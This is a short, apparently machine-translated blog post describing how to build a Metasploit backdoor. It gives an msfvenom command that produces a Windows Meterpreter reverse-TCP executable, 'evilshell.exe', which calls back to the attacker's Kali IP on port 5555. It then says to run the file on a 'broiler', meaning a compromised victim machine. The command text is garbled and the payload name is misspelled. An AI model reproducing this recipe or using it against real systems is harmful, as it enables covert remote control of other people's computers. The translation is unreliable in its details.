Try uploading a malicious backdoor file metasploit

MSF penetration tool is required to open the database before msfconsole database, based

 

 By msfvenom -p windows / metepreter / reverse_tcp lhost = kali's ip lport = 5555 exe> ./root/desktop/evilshell.exe

Because a lot of trouble rights, directly created in the current directory

 

 get

 

 After testing download evilshell.exe broiler and click away.

 

Guess you like

Origin www.cnblogs.com/shayanboy/p/11570321.html